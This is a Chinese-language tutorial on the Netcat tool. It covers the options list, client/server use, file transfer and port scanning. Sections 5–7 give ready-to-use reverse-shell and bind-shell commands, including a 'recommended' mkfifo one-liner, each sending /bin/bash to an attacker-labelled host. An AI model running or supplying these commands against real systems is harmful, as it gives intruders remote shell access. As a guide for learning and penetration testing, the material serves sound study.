介紹

Netcat (nc) 是一個簡單的 Unix 工具，用來透過網路連線讀取與寫入資料，支援 TCP 或 UDP 協定

它被設計為一個可靠的後端工具，可以直接使用，也可以很容易地被其他程式或腳本驅動

基本使用(synopsis)

nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]

參數(options)

-c string    specify shell commands to exec after connect (use with caution).  The string is passed
            to  /bin/sh  -c  for execution.  See the -e option if you don't have a working /bin/sh
            (Note that POSIX-conformant system must have one).

-e filename  specify filename to exec after connect (use with caution).  See the -c option for  en‐
            hanced functionality.

-g gateway   source-routing hop point[s], up to 8

-G num       source-routing pointer: 4, 8, 12, ...

-h           display help

-i secs      delay interval for lines sent, ports scanned

-l           listen mode, for inbound connects

-n           numeric-only IP addresses, no DNS

-o file      hex dump of traffic
-p port      local port number (port numbers can be individual or ranges: lo-hi [inclusive])

-q seconds   after  EOF on stdin, wait the specified number of seconds and then quit. If seconds is
            negative, wait forever.

-b           allow UDP broadcasts

-r           randomize local and remote ports

-s addr      local source address

-t           enable telnet negotiation

-u           UDP mode

-v           verbose [use twice to be more verbose]

-w secs      timeout for connects and final net reads

-C           Send CRLF as line-ending

-z           zero-I/O mode [used for scanning]

-T type      set TOS flag (type may be one of "Minimize-Delay",  "Maximize-Throughput",  "Maximize-
            Reliability", or "Minimize-Cost".)

其中挑幾個比較常用的介紹：

• -u: 指定使用UDP(Netcat默認使用TCP)
• -s: 指定IP地址/Hostname
• -l: 使用監聽模式
• -p: 指定port
• -v: 更詳細的結果
• -n: 指定只能使用IP地址(no DNS)
• -w: 指定timeout/sec(如-w3表示3秒)
• -z: 做端口掃描(zero-I/O,指不會發送任何訊息只做端口探測)

常用指令&場景(frequently used commands & scenarios)

1. TCP Client & Server:

   nc 192.168.32.24 5000   #tcp client: 可用來手動測試HTTP、SMTP、FTP等基於TCP的協議
   nc -lvp 5000            #tcp server: 配合反向shell使用或接收資料
   

2. UDP Client & Server:

   nc -u 192.168.32.24 5000    #udp client: 可用來手動測試HTTP、SMTP、FTP等基於TCP的協議
   nc -luvp 5000               #udp server: 用來測試UDP回應或用在簡單的echo server
   

3. 傳送資料到TCP/UDP服務

   echo "hello" | nc -nv 192.168.32.24 5000        #測試tcp下該port有沒有回應
   echo "ping" | nc -u -nv 192.168.32.24 5000      #測試udp下該port有沒有回應
   

4. 檔案傳送用TCP
   • 傳送端

     nc -lvp 5000 < secret.txt
     

   • 接收端

     nc localhost 5000 > secret.txt
     

5. Reverse Shell(攻擊者先開啟監聽，受害者把它的shell丟給攻擊者)
   • 攻擊者(監聽者,假設192.168.2.3)

     nc -lvp 5000
     

   • 受害者(執行payload)

     nc 192.168.2.3 5000 -e /bin/bash
     

6. Bind Shell(受害者變監聽端)
   • 受害者(監聽者,假設192.168.2.4)

     nc -lvp 5000 -e /bin/bash
     

   • 攻擊者

     nc 192.168.2.4 5000
     

7. Reverse Shell(using mkfifo, recommended)
   • 假設攻擊者IP=192.168.2.3

     mkfifo /tmp/f; /bin/sh < /tmp/f | nc 192.168.2.3 4444 > /tmp/f
     

8. Port Scanning(還是推薦Nmap,Netcat只推薦在不想那麼麻煩的情況下)

   nc -zv 192.168.1.0 20-1000
   

參考資料(Reference)

• Netcat Linux Command Manpage
• nc Command (Netcat) with Examples